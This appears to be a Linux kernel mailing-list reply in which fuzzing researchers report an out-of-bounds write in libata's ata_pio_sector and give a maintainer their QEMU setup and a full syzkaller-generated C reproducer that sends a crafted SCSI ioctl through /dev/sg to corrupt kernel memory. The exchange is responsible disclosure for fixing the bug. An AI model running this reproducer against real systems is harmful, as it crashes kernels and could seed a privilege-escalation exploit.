On Thu, Jan 2, 2025 at 5:40 AM Niklas Cassel <cassel@xxxxxxxxxx> wrote: > > Hello reveliofuzzing, > > On Wed, Jan 01, 2025 at 09:17:02PM -0500, reveliofuzzing wrote: > > Hi there, > > > > We found an out-of-bounds write in the function ata_pio_sector, which can cause > > the kernel to crash. We would like to report it for your reference. > > > > ## Problem in ata_pio_sector > > ata_pio_sector uses the following code to decide which page to use for the I/O: > > page = sg_page(qc->cursg); > > offset = qc->cursg->offset + qc->cursg_ofs; > > > > /* get the current page and offset */ > > page = nth_page(page, (offset >> PAGE_SHIFT)); > > offset %= PAGE_SIZE; > > but we found that `offset` could be as high as 0x5000---qc->cursg_ofs==0x5000, > > qc->cursg->offset == 0x0, making `page` point to a higher-position page that > > belongs to other threads. > > > > ## Example crash > > This out-of-bound write can cause the kernel to crash at arbitrary places, > > depending on when the corrupted page is accessed by the other thread. > > > > We found this problem can happen in Linux kernel 6.1~6.12. Here is one crash in > > Linux kernel 6.1: > > Thank you for reporting! > > I assume that you haven't tested kernels earlier than 6.1? Unfortunately, we haven't tested older kernels. > > (Looking at the driver, there was no major change between 6.0 and 6.1, > so this bug has probably been there for a long time.) > > > Could you please share your reproducer and your kernel config as well? Below we report our setup for linux kernel 6.12: - General steps to reproduce the bug 1. Launch the VM 2. Copy the reproducer (compiled binary) into the VM 3. Run it with the root user 4. Wait for the bug to happen (generally takes less than 3 minutes) - QEMU command (QEMU emulator version 4.2.1 (Debian 1:4.2-3ubuntu6.30)) qemu-system-x86_64 -m 2G -smp 2 -kernel /linux-6.12/bzImage \ -append "console=ttyS0 root=/dev/sda earlyprintk=serial net.ifnames=0" \ -drive file=./bullseye.img,format=raw \ -net user,host=10.0.2.10,hostfwd=tcp:127.0.0.1:10021-:22 \ -net nic,model=e1000 \ -enable-kvm \ -nographic \ -pidfile vm.pid \ 2>&1 | tee vm.log - VM image It is created using Syzkaller's script: https://github.com/google/syzkaller/blob/master/tools/create-image.sh - bzImage - kernel: 6.12 - GCC: Ubuntu 9.4.0-1ubuntu1~20.04.2 - config: https://drive.google.com/file/d/1ZfeXgVadChVJtIGx5zMhBqHnmlomP3Hf/view?usp=sharing - compiled bzimage: https://drive.google.com/file/d/1MJf0WQ9_eztvuBcaBwCGC-rb7VBQtuac/view?usp=sharing - reproducer - compiled binary: https://drive.google.com/file/d/1Q9prtQKi5LVrOwrFJ162eXzTwTnDUq5X/view?usp=sharing - C program: // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include <dirent.h> #include <endian.h> #include <errno.h> #include <fcntl.h> #include <sched.h> #include <setjmp.h> #include <signal.h> #include <stdarg.h> #include <stdbool.h> #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/mount.h> #include <sys/prctl.h> #include <sys/resource.h> #include <sys/stat.h> #include <sys/syscall.h> #include <sys/time.h> #include <sys/types.h> #include <sys/wait.h> #include <time.h> #include <unistd.h> #include <linux/capability.h> static unsigned long long procid; static __thread int clone_ongoing; static __thread int skip_segv; static __thread jmp_buf segv_env; static void segv_handler(int sig, siginfo_t* info, void* ctx) { if (__atomic_load_n(&clone_ongoing, __ATOMIC_RELAXED) != 0) { exit(sig); } uintptr_t addr = (uintptr_t)info->si_addr; const uintptr_t prog_start = 1 << 20; const uintptr_t prog_end = 100 << 20; int skip = __atomic_load_n(&skip_segv, __ATOMIC_RELAXED) != 0; int valid = addr < prog_start || addr > prog_end; if (skip && valid) { _longjmp(segv_env, 1); } exit(sig); } static void install_segv_handler(void) { struct sigaction sa; memset(&sa, 0, sizeof(sa)); sa.sa_handler = SIG_IGN; syscall(SYS_rt_sigaction, 0x20, &sa, NULL, 8); syscall(SYS_rt_sigaction, 0x21, &sa, NULL, 8); memset(&sa, 0, sizeof(sa)); sa.sa_sigaction = segv_handler; sa.sa_flags = SA_NODEFER | SA_SIGINFO; sigaction(SIGSEGV, &sa, NULL); sigaction(SIGBUS, &sa, NULL); } #define NONFAILING(...) ({ int ok = 1; __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); if (_setjmp(segv_env) == 0) { __VA_ARGS__; } else ok = 0; __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); ok; }) static void sleep_ms(uint64_t ms) { usleep(ms * 1000); } static uint64_t current_time_ms(void) { struct timespec ts; if (clock_gettime(CLOCK_MONOTONIC, &ts)) exit(1); return (uint64_t)ts.tv_sec * 1000 + (uint64_t)ts.tv_nsec / 1000000; } static bool write_file(const char* file, const char* what, ...) { char buf[1024]; va_list args; va_start(args, what); vsnprintf(buf, sizeof(buf), what, args); va_end(args); buf[sizeof(buf) - 1] = 0; int len = strlen(buf); int fd = open(file, O_WRONLY | O_CLOEXEC); if (fd == -1) return false; if (write(fd, buf, len) != len) { int err = errno; close(fd); errno = err; return false; } close(fd); return true; } static long syz_open_dev(volatile long a0, volatile long a1, volatile long a2) { if (a0 == 0xc || a0 == 0xb) { char buf[128]; sprintf(buf, "/dev/%s/%d:%d", a0 == 0xc ? "char" : "block", (uint8_t)a1, (uint8_t)a2); return open(buf, O_RDWR, 0); } else { char buf[1024]; char* hash; strncpy(buf, (char*)a0, sizeof(buf) - 1); buf[sizeof(buf) - 1] = 0; while ((hash = strchr(buf, '#'))) { *hash = '0' + (char)(a1 % 10); a1 /= 10; } return open(buf, a2, 0); } } static void setup_binderfs(); static void setup_fusectl(); static void sandbox_common_mount_tmpfs(void) { write_file("/proc/sys/fs/mount-max", "100000"); if (mkdir("./syz-tmp", 0777)) exit(1); if (mount("", "./syz-tmp", "tmpfs", 0, NULL)) exit(1); if (mkdir("./syz-tmp/newroot", 0777)) exit(1); if (mkdir("./syz-tmp/newroot/dev", 0700)) exit(1); unsigned bind_mount_flags = MS_BIND | MS_REC | MS_PRIVATE; if (mount("/dev", "./syz-tmp/newroot/dev", NULL, bind_mount_flags, NULL)) exit(1); if (mkdir("./syz-tmp/newroot/proc", 0700)) exit(1); if (mount("syz-proc", "./syz-tmp/newroot/proc", "proc", 0, NULL)) exit(1); if (mkdir("./syz-tmp/newroot/selinux", 0700)) exit(1); const char* selinux_path = "./syz-tmp/newroot/selinux"; if (mount("/selinux", selinux_path, NULL, bind_mount_flags, NULL)) { if (errno != ENOENT) exit(1); if (mount("/sys/fs/selinux", selinux_path, NULL, bind_mount_flags, NULL) && errno != ENOENT) exit(1); } if (mkdir("./syz-tmp/newroot/sys", 0700)) exit(1); if (mount("/sys", "./syz-tmp/newroot/sys", 0, bind_mount_flags, NULL)) exit(1); if (mount("/sys/kernel/debug", "./syz-tmp/newroot/sys/kernel/debug", NULL, bind_mount_flags, NULL) && errno != ENOENT) exit(1); if (mount("/sys/fs/smackfs", "./syz-tmp/newroot/sys/fs/smackfs", NULL, bind_mount_flags, NULL) && errno != ENOENT) exit(1); if (mount("/proc/sys/fs/binfmt_misc", "./syz-tmp/newroot/proc/sys/fs/binfmt_misc", NULL, bind_mount_flags, NULL) && errno != ENOENT) exit(1); if (mkdir("./syz-tmp/pivot", 0777)) exit(1); if (syscall(SYS_pivot_root, "./syz-tmp", "./syz-tmp/pivot")) { if (chdir("./syz-tmp")) exit(1); } else { if (chdir("/")) exit(1); if (umount2("./pivot", MNT_DETACH)) exit(1); } if (chroot("./newroot")) exit(1); if (chdir("/")) exit(1); setup_binderfs(); setup_fusectl(); } static void setup_fusectl() { if (mount(0, "/sys/fs/fuse/connections", "fusectl", 0, 0)) { } } static void setup_binderfs() { if (mkdir("/dev/binderfs", 0777)) { } if (mount("binder", "/dev/binderfs", "binder", 0, NULL)) { } if (symlink("/dev/binderfs", "./binderfs")) { } } static void loop(); static void sandbox_common() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); if (getppid() == 1) exit(1); struct rlimit rlim; rlim.rlim_cur = rlim.rlim_max = (200 << 20); setrlimit(RLIMIT_AS, &rlim); rlim.rlim_cur = rlim.rlim_max = 32 << 20; setrlimit(RLIMIT_MEMLOCK, &rlim); rlim.rlim_cur = rlim.rlim_max = 136 << 20; setrlimit(RLIMIT_FSIZE, &rlim); rlim.rlim_cur = rlim.rlim_max = 1 << 20; setrlimit(RLIMIT_STACK, &rlim); rlim.rlim_cur = rlim.rlim_max = 128 << 20; setrlimit(RLIMIT_CORE, &rlim); rlim.rlim_cur = rlim.rlim_max = 256; setrlimit(RLIMIT_NOFILE, &rlim); if (unshare(CLONE_NEWNS)) { } if (mount(NULL, "/", NULL, MS_REC | MS_PRIVATE, NULL)) { } if (unshare(CLONE_NEWIPC)) { } if (unshare(0x02000000)) { } if (unshare(CLONE_NEWUTS)) { } if (unshare(CLONE_SYSVSEM)) { } typedef struct { const char* name; const char* value; } sysctl_t; static const sysctl_t sysctls[] = { {"/proc/sys/kernel/shmmax", "16777216"}, {"/proc/sys/kernel/shmall", "536870912"}, {"/proc/sys/kernel/shmmni", "1024"}, {"/proc/sys/kernel/msgmax", "8192"}, {"/proc/sys/kernel/msgmni", "1024"}, {"/proc/sys/kernel/msgmnb", "1024"}, {"/proc/sys/kernel/sem", "1024 1048576 500 1024"}, }; unsigned i; for (i = 0; i < sizeof(sysctls) / sizeof(sysctls[0]); i++) write_file(sysctls[i].name, sysctls[i].value); } static int wait_for_loop(int pid) { if (pid < 0) exit(1); int status = 0; while (waitpid(-1, &status, __WALL) != pid) { } return WEXITSTATUS(status); } static void drop_caps(void) { struct __user_cap_header_struct cap_hdr = {}; struct __user_cap_data_struct cap_data[2] = {}; cap_hdr.version = _LINUX_CAPABILITY_VERSION_3; cap_hdr.pid = getpid(); if (syscall(SYS_capget, &cap_hdr, &cap_data)) exit(1); const int drop = (1 << CAP_SYS_PTRACE) | (1 << CAP_SYS_NICE); cap_data[0].effective &= ~drop; cap_data[0].permitted &= ~drop; cap_data[0].inheritable &= ~drop; if (syscall(SYS_capset, &cap_hdr, &cap_data)) exit(1); } static int do_sandbox_none(void) { if (unshare(CLONE_NEWPID)) { } int pid = fork(); if (pid != 0) return wait_for_loop(pid); sandbox_common(); drop_caps(); if (unshare(CLONE_NEWNET)) { } write_file("/proc/sys/net/ipv4/ping_group_range", "0 65535"); sandbox_common_mount_tmpfs(); loop(); exit(1); } static void kill_and_wait(int pid, int* status) { kill(-pid, SIGKILL); kill(pid, SIGKILL); for (int i = 0; i < 100; i++) { if (waitpid(-1, status, WNOHANG | __WALL) == pid) return; usleep(1000); } DIR* dir = opendir("/sys/fs/fuse/connections"); if (dir) { for (;;) { struct dirent* ent = readdir(dir); if (!ent) break; if (strcmp(ent->d_name, ".") == 0 || strcmp(ent->d_name, "..") == 0) continue; char abort[300]; snprintf(abort, sizeof(abort), "/sys/fs/fuse/connections/%s/abort", ent->d_name); int fd = open(abort, O_WRONLY); if (fd == -1) { continue; } if (write(fd, abort, 1) < 0) { } close(fd); } closedir(dir); } else { } while (waitpid(-1, status, __WALL) != pid) { } } static void setup_test() { prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0); setpgrp(); write_file("/proc/self/oom_score_adj", "1000"); } static void execute_one(void); #define WAIT_FLAGS __WALL static void loop(void) { int iter = 0; for (;; iter++) { int pid = fork(); if (pid < 0) exit(1); if (pid == 0) { setup_test(); execute_one(); exit(0); } int status = 0; uint64_t start = current_time_ms(); for (;;) { sleep_ms(10); if (waitpid(-1, &status, WNOHANG | WAIT_FLAGS) == pid) break; if (current_time_ms() - start < 5000) continue; kill_and_wait(pid, &status); break; } } } uint64_t r[1] = {0xffffffffffffffff}; void execute_one(void) { intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) {} NONFAILING(memcpy((void*)0x20000000, "/dev/sg#\000", 9)); res = -1; NONFAILING(res = syz_open_dev(/*dev=*/0x20000000, /*id=*/0, /*flags=*/0)); if (res != -1) r[0] = res; NONFAILING(memcpy((void*)0x20000040, "\x00\x00\x00\x00\x42\x0d\x00\x00\x85\x0a\xaa", 11)); NONFAILING(sprintf((char*)0x2000004b, "0x%016llx", (long long)r[0])); syscall(__NR_ioctl, /*fd=*/r[0], /*cmd=*/1, /*arg=*/0x20000040ul); } int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/0x32ul, /*fd=*/-1, /*offset=*/0ul); const char* reason; (void)reason; install_segv_handler(); for (procid = 0; procid < 4; procid++) { if (fork() == 0) { do_sandbox_none(); } } sleep(1000000); return 0; } > > > Kind regards, > Niklas